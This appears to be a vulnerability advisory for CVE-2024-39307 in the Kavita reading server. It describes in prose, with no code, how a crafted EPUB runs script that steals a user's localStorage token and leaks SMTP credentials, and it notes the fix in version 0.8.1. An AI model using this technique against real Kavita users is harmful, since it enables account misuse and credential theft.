CVE-2024-39307

Vulnerability

Kavita, a cross-platform reading server, does not sanitize or sandbox the contents of EPUB files. This allows malicious scripts embedded within ebooks to execute in the browsing context of the user who opens the file [1]. The root cause is the lack of any content security measures for ebook rendering, enabling arbitrary JavaScript execution.

Exploitation

An attacker can craft an EPUB file containing a malicious script, such as one that retrieves the user's authentication token from localStorage and makes API requests with it [1]. The user must open the crafted ebook, but no additional authentication is required beyond the user being logged into Kavita. Distribution could occur via pirate sites or online conversion services [1].

Impact

Once executed, the script can perform any action that the logged-in user can, including leaking sensitive configuration data like SMTP credentials [1]. However, due to Kavita's limited API surface, the attack does not lead to remote code execution on the server itself. The impact is confined to actions available through the user's session.

Mitigation

The vulnerability has been patched in Kavita version 0.8.1 [1]. Users are advised to update to the latest version to prevent exploitation.